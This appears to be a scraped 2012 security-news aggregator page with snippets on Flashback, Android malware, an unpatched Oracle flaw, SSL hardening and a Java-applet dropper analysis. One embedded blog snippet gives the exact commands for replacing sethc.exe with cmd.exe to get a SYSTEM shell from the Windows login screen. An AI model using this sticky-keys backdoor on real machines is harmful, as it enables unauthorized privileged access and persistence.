The number of malicious programs that target Google's Android mobile platform is growing at an alarming rate, according to data from anti-malware company F-Secure. 

read more

The security research firm found that Apple iOS traffic on the Web is growing, which will most likely draw more hacker interest to the mobile devices. – Apple devices from iPhones to iPads to Macs are becoming more prominent in enterprises as employees bring them to work, fueling the burgeoning trend of the consumerization of IT.
And that could cause security problems for businesses, according to researchers at security software maker Zscaler.
The…

Apple on Wednesday patched four security vulnerabilities in Safari and blocked outdated versions of Adobe’s Flash Player from running in its browser.

Online crooks are moving beyond just Facebook and Twitter to try to trick users into downloading malicious payloads.

Somehow these SQL Injections targetting ASP/ASP.net sites just never seem to abate.

First there was Lizamoon… Surprising us with the millions of websites that got injected.

Then came a few others with the recent ones being nikjju.com and hgbyju.com.

Now came njukol…

Although the name is no longer as catchy as Lizamoon, the idea remains the same.

This njukol.com is still pretty fresh out of the oven. The domain was registered last April 28. The funny thing is, the registrant of the domain is still the same with all those previous ones.

On 03/05/12 At 04:31 PM

Hackers break into a Belgian bank, steal confidential customer information, and then blackmail the bank: pay us or we expose your customers’ confidential data. Who is the real victim here?

Cybersecurity jobs are plentiful, from government, financial services and utilities to manufacturing and retail. But what skills do IT professionals need to qualify for these high-paying jobs?

A vulnerability in Skype that could expose members' IP addresses may have been known to Skype officials as far back as November 2010. A researcher who first discovered the flaw speculates it may have been left exposed perhaps because it was deeply embedded in the code and could cause other problems, according to a Wall Street Journal blog.

read more

The cyber-criminals behind the botnet stole ad revenue from Google by redirecting clicks from infected Apple Mac systems, according to Symantec researchers. – The cyber-criminals running the notorious Mac Flashback malware were bringing in as much as $10,000 a day during the height of the botnet’s activity, according to security software vendor Symantec.
The attackers behind the Flashback malware which at one point had infected as many as 700,000 Apple M…

Oracle has declined to patch a critical vulnerability in its flagship database product, leaving customers vulnerable to attacks that siphon confidential information from corporate servers and execute malware on backend systems, a security researcher said.

Virtually all versions of the Oracle Database Server released in the past 13 years contain a bug that allows hackers to perform man-in-the-middle attacks that monitor all data passing between the server and end users who are connected to it. That’s what Joxean Koret, a security researcher based in Spain, told Ars. The “Oracle TNS Poison” vulnerability, as he has dubbed it, resides in the Transparent Network Substrate Listener, which routes connections between clients and the database server. Koret said Oracle learned of the bug in 2008 and indicated in a recent e-mail that it had no plans to fix current supported versions of the enterprise product because of concerns it could cause “regressions” in the code base.

Read the comments on this post

This has been documented all over, but i like things to be on the blog so i can find them…

You can gain a SYSTEM shell on an application you have administrative access on  or if you have physical access to the box and can boot to repair disk or linux distro and can change files.

make a copy somewhere of the original on system sethc.exe

copy c:\windows\system32\sethc.exe c:\


cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe


copy cmd.exe into sethc.exe’s place


copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe


or


cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe


Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing

it would probably be nice to sethc.exe back when you are done.

Less than 10 percent of the most popular websites offering Secure Socket Layer protection are hardened against known attacks that could allow hackers to decrypt or tamper with encrypted traffic, researchers said Thursday.

The grim figure was generated by SSL Pulse, a website that monitors the effectiveness of the 200,000 most popular websites that use SSL, also known as Transport Layer Security, to protect e-mail and other sensitive data from being snooped on while in transit. The product of a group of SSL experts from Google, Twitter, PayPal, Qualys and other firms, SSL Pulse systematically scans all subdomains of the top-ranked sites as measured by Alexa for pages that use the protocol to prevent man-in-the-middle eavesdropping. By examining the top 200,000 SSL-enabled sites, the researchers aim to give a snapshot of the overall health of SSL protection, which is offered by an estimated 1.5 million sites in total.

Read the comments on this post

A new, sneakier variant of the Flashback malware has been uncovered by the French security firm Intego.

Flashback.S installs itself without a password and then deletes files and folders to mask its presence, a security company announces.

Symantec Security Response, along with some other security vendors, reported the discovery of the OSX.Flashback malware recently patched by Apple. Many people may be surprised to learn the infection volume is reported at over 600,000 computers.

On a new front, we have recently identified new Java Applet malware, which uses the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507) to download its payload. This attack vector is the same as the older one, but in this case the Java Applet checks which OS it is running on and downloads a suitable malware for the OS. This is explained further in the following illustration:
 

 

When a victim loads the Java Applet malware, it breaks the Java Applet sandbox by using the CVE-2012-0507 vulnerability. This vulnerability is effective for both Mac and Windows operating systems. Then, if the threat is running on a Mac operating system, it downloads a dropper type malware written in Python. However, if the threat is running on a Windows operating system, it downloads a standard Windows executable file dropper. Both droppers drop a Trojan horse program that opens a back door on the compromised computer.

The following Java code illustrates how the Java Applet malware checks which OS it is running on, downloads the dropper, and executes it:
 

 

The Trojan only checks whether it is a Windows operating system or not in this code, but the downloaded Python dropper checks again whether it is a Mac operating system or not. If it is running on Linux or some other operating system, the threat does nothing. Python is not a popular script to write malware in, but it works fine on a Mac operating system because Python has already been installed by default.

Finally, one of two back door Trojans is dropped on to the computer. These two Trojans are downloaded from the same server, but are a little bit different from each other.

The back door Trojan for the Mac operating system written in Python can control the “polling times”, which is related to how many times it gets commands from the server at certain time intervals. The author has done this in order to avoid IDS or IPS detection by reducing network communication. The network connection is also encrypted by RC4 or compressed by Zlib.

Currently, the main function is only to get a Python script and execute it. The threat also has the following functions, but these are currently disabled:

• Download files
• List files and folders
• Open a remote shell
• Sleep
• Upload files

On the other hand, the back door Trojan for the Windows operating system is written in C++. This Trojan sends the following information back to the remote attacker:

• CPU details
• Disk details
• Memory usage
• OS version
• User name

The Trojan may also download a file and execute it, or open a shell to receive commands.

Recently, malware that targets Mac computers, such as OSX.Flashback and OSX.Sabpab, are increasing. This recent increase provides evidence that malware authors now consider Mac computers a viable battleground along with the Windows platform. Certainly it is now time for you to arm your Mac computer with a good security product.

Symantec detects the Java Applet malware as Trojan.Maljava, the droppers as Trojan.Dropper, and the back door Trojans as Backdoor.Trojan. We continue to watch out for both Mac and Windows malware in order to protect our customers.

To stay safe, please ensure that you have the latest patches installed on your system and keep your antivirus definitions up to date.

Apple Mac users who visited the hijacked WordPress sites were infected by the malware, which morphed from a Trojan horse to a drive-by exploit, Kaspersky researchers said. – The Flashback malware that eventually infected more than 600,000 Macs worldwide probably started from tens of thousands of WordPress blog sites that had been hacked into and compromised, according to researchers at Kaspersky Lab.
In March, the malware creators changed the way they wanted the Flashb…

The recent Flashback malware attack, which at its height infected more than 600,000 Macs& or more than 1 percent of all systems in use worldwide& not only was the largest such incident involving Apple systems, but also the latest in a string of such attacks. The Flashback exploit& and the number of Macs involved& shook the theory that Apple systems are essentially invulnerable to Trojans, viruses and other malware, and also illustrated the companys inexperience in handling such security situations and dealing with the security community. And it also highlighted what security researchers have been saying for a while: that as Apple devices& not only Macs, but also iPhones and iPads& continue to grow in popularity among consumers and businesses alike, so will the interest from scammers. Costin Raiu, a security expert with Kaspersky Lab, wrote in an April 9 post on the companys SecureList blog that attacks on Apple systems will only continue: “At the beginning of 2012, we predicted an increase in the number of attacks on Mac OS X which take advantage of zero-day or unpatched vulnerabilities. This is a normal development, which happens on any other platform with enough market share to guarantee a return on investment for virus writers, so Mac OS X fans shouldnt be disappointed because of this. During the next few months, we are probably going to see more attacks of this kind, which focus on exploiting two main things: outdated software and the users lack of awareness.” Here are some of the malware issues that have targeted Apple during the past 18 months. – …